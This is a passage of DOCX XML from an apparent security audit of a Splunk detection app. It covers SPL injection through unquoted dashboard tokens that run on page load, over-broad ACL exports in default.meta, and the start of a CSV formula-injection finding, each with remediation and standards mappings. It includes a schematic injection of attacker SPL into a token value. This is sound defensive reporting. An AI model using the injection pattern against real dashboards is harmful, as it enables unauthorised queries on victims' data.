          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dashboards/applocker.json:27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (token inputs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>policyname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dropdown line 163, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eventcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dropdown line 294; layout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitButton: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitOnDashboardLoad: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines 303-304). Excerpt (query, line 27):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"query": "`applocker`\n| spath input=UserData_Xml | rename RuleAndFileData.* as *\n| lookup applockereventcodes EventCode OUTPUT Description\n|  search  PolicyName=$policyname$ EventCode=$eventcode$\n| stats values(host) AS dest by ..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A Dashboard Studio (JSON) search inlines two tokens directly into an SPL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter and no quoting at all. Unlike APP-01 there is not even a prefix/suffix wrapper, so any character — pipe, double-quote, bracket — passes straight into the SPL parser. The dashboard sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitOnDashboardLoad: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so a crafted URL that seeds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.policyname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.eventcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executes the injected search automatically on page load, without the victim clicking "Submit".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Source = URL token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.policyname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>form.eventcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Sink = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search PolicyName=$policyname$ EventCode=$eventcode$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No escaping present. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitOnDashboardLoad: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> removes the interaction barrier. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (within the victim's own privileges; victim must open the link — UI:R).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC (defensive description, not run against any host):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A token value containing a space and a pipe terminates the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arguments and starts a new command, e.g. the composed pipeline becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... | search PolicyName=* &lt;attacker SPL&gt; EventCode=...</w:t>
      </w:r>
      <w:r>
        <w:t>. Because the panel auto-runs on load, merely opening the crafted dashboard URL triggers it. Impact is bounded by the victim's capabilities (read of searchable data; tampering only if the victim can run write commands). No live request was issued.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation (full fixed code + explanation):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quote both tokens with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>|  search  PolicyName=$policyname|s$ EventCode=$eventcode|s$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Also prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submitOnDashboardLoad: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for dashboards whose panels consume URL-seedable tokens, and restrict inputs to enumerated dropdown choices. Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> escapes and quotes each value so it is parsed as a single literal; disabling auto-run restores the user-intent barrier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 / CWE-89 family (2024 CWE Top 25 #3). OWASP A03:2021 Injection. ASVS v4 5.3.4. ATT&amp;CK T1059. NIST 800-53 Rev5 SI-10, AC-4. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28. SANS/CERT IDS00. Best practice: Splunk Dashboard Studio token filters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-89 SQL Injection (2024 CWE Top 25 #3). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-08 — default.meta exports all knowledge objects system-wide with admin/sc_admin write (tampering surface)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Conditionally exploitable (privileged insider).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> app_template/metadata/default.meta:3-4,7,13-14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 3.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_template/metadata/default.meta:3-4,7,13-14</w:t>
      </w:r>
      <w:r>
        <w:t>. Excerpt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>3    access = read : [ * ], write : [ admin, sc_admin ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>4    export = system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>7    [savedsearches]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>7      owner = admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>13   [savedsearches/default]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>14     export = none</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The default stanza exports all app knowledge objects to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scope (visible to the whole Splunk deployment) and grants write to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> roles. Export=system means any detection/macro/lookup object is readable deployment-wide. Write is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> world-writable (it is limited to two privileged roles), which materially limits the stored-content-tampering risk: an actor must already hold </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to modify the shipped detections, macros, or lookups. The tampering risk to call out: because these roles can write the ESCU knowledge objects and those objects feed correlation searches and notable-event generation, a compromised admin/sc_admin account could silently weaken detections or poison lookup allow-lists (e.g. add their own host to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kube_allowed_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> list) and the change would propagate deployment-wide via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>export = system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>savedsearches/default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is correctly scoped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>export = none</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Requires an authenticated privileged role. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (privileged-insider / post-compromise; not a remote-unauth path). Rated Low because write is already restricted to admin roles — this is the expected Splunk ACL model, noted for defense-in-depth and change-monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Read of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.meta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL; no exploit — the finding is the trust/monitoring implication of wide export + shared write of security content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Keep write restricted (it already is). Add file-integrity / change monitoring on the ESCU knowledge bundle (lookups, macros, savedsearches) so that unexpected edits by admin/sc_admin are alerted on; consider narrowing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>export = system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the app context where feasible; separate duties so the role that tunes allow-lists is audited. Explanation: with write necessarily held by admins, the compensating control is detection of malicious change, not further ACL tightening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-732 (Incorrect Permission Assignment for Critical Resource) analog; CWE-284 (Improper Access Control). OWASP A01:2021 Broken Access Control / A05 Misconfiguration. ASVS v4 4.1 / 1.4. ATT&amp;CK T1562.001 (Impair Defenses: Disable/Modify Tools), T1098. NIST 800-53 Rev5 AC-3, AC-6, CM-5, AU-6, SI-7. NIST CSF 2.0 PR.AA / PR.PS / DE.CM. ISO 27001:2022 A.8.2, A.8.3, A.8.9. SANS/CERT: least privilege + integrity monitoring. Best practice: Splunk ACL / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.meta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> least-exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-732 Incorrect Permission Assignment for Critical Resource; CWE-284 Improper Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control, A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools, T1098 Account Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, AC-6 Least Privilege, CM-5 Access Restrictions for Change, SI-7 Software, Firmware, and Information Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control, DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.2 Privileged access rights, A.8.3 Information access restriction, A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-07 — Lookup CSV cells beginning with formula characters (export-boundary CSV injection surface only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.0). Exploitability: Conditionally exploitable (spreadsheet export).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lookups/csv/cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.csv:318,320; scripting_tools_user_agents.csv:42; windows_suspicious_tasks.csv:13-14; char_conversion_matrix.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 4.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (realized only on spreadsheet export of lookup contents)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location (exact cells):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.csv:318</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>- Zoho Assist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2nd column) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:320</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>- Zoom Meeting</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
